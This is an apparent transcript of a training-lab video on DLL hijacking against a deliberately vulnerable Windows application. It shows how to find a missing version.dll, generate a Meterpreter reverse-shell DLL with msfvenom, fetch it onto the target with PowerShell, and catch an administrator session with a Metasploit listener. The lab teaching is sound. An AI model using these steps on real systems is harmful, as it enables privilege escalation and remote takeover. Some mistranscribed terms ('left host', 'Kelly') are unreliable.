Hi, my name is Sam and I lead the application security team at Genetech. You are watching my submission for the July lab sprint from Pentester Academy and INE, during which I will be covering DLL hijacking. DLL hijacking, in my opinion, is one of the most widespread issues when it comes to Windows applications, and also one of the easiest ways to elevate your privileges once you've gained a foothold on a system. Whether you're a newcomer to the offensive security side of things or a more seasoned pentester who is only looking for a refresh, I'm hoping that this video will be helpful to you and will allow you to complete the lab. Enjoy! First thing first, let's take a look at the lab guide and see what kinds of information we can gather from it. The first thing you'll notice is that we are provided with 3 virtual machines. The first machine, the Kali machine, will be used to craft our payload, host it, as well as receive the reverse shell coming back from our target machine. The second machine, the regular user, will be our attacking machine and will be in charge of injecting the DLL into the installation folder for the vulnerable application. Finally, our third machine, the administrator, will be running the vulnerable application, DVTA.exe, which will be installed on their desktop, as well as the process monitor or procmon utility, which we will be using in order to identify which DLL we could use to perform DLL hijacking on the machine. Finally, the guide also provides us with the command ipconfig, which we can run on the lab machines in order to identify the IP address of each of the machines we'll be interacting with. Another piece of information that I think is very important to keep in mind is how libraries work and how they are imported into an application. A library is a piece of code that is provided to a developer in order for them to quickly use new functions or features, including interaction with third-party systems or APIs, as well as leveraging features from the operating system itself. There are 2 different ways that you can integrate a library into your application, with the first one being static linking, in which case the library is simply embedded into the application or executable and cannot be modified. And the second one is dynamic linking, in which case the library is stored on the file system, usually as a DLL, so dynamic linked library, and can be imported at runtime by the application, which will search a file system for it. In the case of a DLL hijacking, which is the attack that we are trying to perform here, what we're going to do is that we're going to store a malicious DLL on the file, in our case in the same folder as the application itself, in order for it to be loaded by the application at runtime and then get a reverse shell at the same privilege level as the application is running, in our case administrator, and send it back to our Kali machine. Let's get to it. After starting the lab and clicking the lab link button, you should be taken to a new tab which will allow you to interact with all 3 machines in the lab. As I mentioned before, our first step here will be to try to identify which DLLs we could hijack in order to get code execution on the machine. In order to do that, we're going to launch procmon, or process monitor, in order to monitor all of the libraries calls that are made by our application, and then launch the vulnerable application DVTA. As you can see, this is a .NET application, which can be identified by the fact that all of the source code files are CS or C# files. So the binary here should be in the bin release folder. And we should now be seeing more entries in our process monitor tool. Now, one way that we can use to quickly identify which DLLs are being imported by our application is to use filters. So what we're going to do is we're going to set up a filter and we're going to look for process name is dvta.exe. We're also going to be looking for the operation create file. And we're going to look for a create file that resulted in a name not found error, meaning that the application looked for a library or DLL file and could not find it. So we're going to do result is name not found. Finally, one last parameter that we may want to add to our filter is the fact that we want the library to be loaded from this specific folder, which our user should have access to, rather than a C-/Windows folder where our user most likely does not have write access. So in order to do that, we're simply going to do path and then starts with our current path. And if we apply this filter, we should now see a few options, including version.dll and dewrite.dll. So in our case, if we manage to write our malicious payload to either of those DLL or library files, we should get remote code execution. Now that we've identified which library we could hijack on the target machine, it is now time to start crafting our payload. In order to do that, the first thing that we're going to do is figure out the IP address for the Kelly machine, since we will be sending the reverse shell back to this machine. We can simply use the command ifconfig in order to do that, and we now know that we should be using the IP address 10.10.22.2. Now, the next step that I'm going to perform is simply move over to the default folder for the Apache web server, since it is the method that I am going to be using in order to transfer my payload over to my attacker and target machine, but there are many ways that you can use to do that. So what I am personally going to do is simply move over to the var-www.html folder, and I can now use a component of the Metasploit framework called MSF Venom in order to build my payload. So the command I'm going to use here is simply MSF Venom -p for payload. So it's going to be a Windows payload / Meterpreter, since this is what we need to do in order to complete the lab, /reverse TCP. So there's different type of Meterpreter shells that you can use, but the one that I'm going to be using is the reverse TCP one. Now, I'm also going to be specifying a lhost, which stands for left host, which is the IP address of the machine I want the shell to go back to. So in our case, as we just figured out, this should be 10.10.22.2. I'm also going to be adding a L port or left port, which is the port that the shell is going to connect back to. This is going to be 4444, which is the default value and one that you will encounter very often when dealing with reverse shells. And the final argument that we're going to use is the -f, which simply specifies the output format, and we're going to be using DLL, and we're going to be writing this file over to the version.dll file. Lastly, I need to run one more command in order to enable the Apache server on this machine, which is apache ctl start. Now that we have crafted our malicious payload, it is now time to hop over to our attacking machine and copy the malicious file over to the target machine. So what I'm going to do is first make sure that I do have access to my Kelly machine from this machine by using my web browser and connecting to my Apache web server, which I just spun up a few seconds ago. So I'm just going to go ahead and do http 10.10.22.2, which should take me to the default web page for Apache. Now, unfortunately, if I did try to download the malicious DLL file that I just created, I would be stopped by the security features built inside Internet Explorer. So obviously these could be turned off and circumvented, but what we're going to do for now is simply use PowerShell in order to copy that file directly onto the target machine without having to use the browser whatsoever. But do keep in mind that, once again, there are many ways that you can transfer the file over to the target machine, and you don't have to do any of this depending on the approach that you've chosen. So the PowerShell command that I'm going to use here is called invoke-web request. And it has two parameters. The first one is -URI, which is where I want to download the file from. So this is obviously going to be the same HTTP server, so 10.10.22.2 /version.dll. Oops. And then the second one is going to be alt file, which is where we want to write this file to. So in this case, this is going to be the administrator's desktop folder, so the same folder where the DVTA application is. So I can simply paste this value and then do \version.dll, which is the name of the DLL we just created. So after running this request, I should see from my target machine a new file called version.dll. With our malicious library now installed onto our target machine, all we have left to do is now set up the listener, which will be in charge of receiving the reverse shell, and start the application on the target machine to get our Meterpreter session. Since we're dealing with a Meterpreter, we're going to have to use, once again, the Metasploit framework in order to set up this listener. So I'm going to go ahead and fire up MSF console. And here we need to make sure that we use the same payload that we specified when we created the malicious DLL using MSF Venom, so the reverse TCP Meterpreter shell. So the first step here is to use the exploit -multi-handler, and then we can specify the same payload that we use. So set payload windows /meterpreter /reverse TCP. And we can now see that we have a couple options that we need to set. So the first one is going to be lhost, so left host. So once again, this has to be the same address IP that we used when we created the malicious DLL. So in our case, this would be 10.10.22.2. And for the port, if we did specify a different port when we created our malicious binary, our malicious library, then we would have to use the same one here. But since we used 4444, which is the default port, then we don't have to do anything. So we can now go ahead and use run or exploit in order to start the listener and go back to our target machine. And once again, fire up the DVTA application. And what should now happen is that we get a Meterpreter session on our Kali virtual machine. The last thing we need to do in order to complete the lab is to make sure that we have administrator level access, which can be done by running command get_uid from the Meterpreter shell. And there you have it. We have now completed the DLL hijacking lab. Thank you very much for watching my video. This is something that I've been meaning to do for a very long time, and I would really appreciate it if you could leave a comment and let me know if you enjoyed it, whether you were able to complete the lab, and if there are other topics that you would like me to cover in the future. As always, keep hacking. Cheers!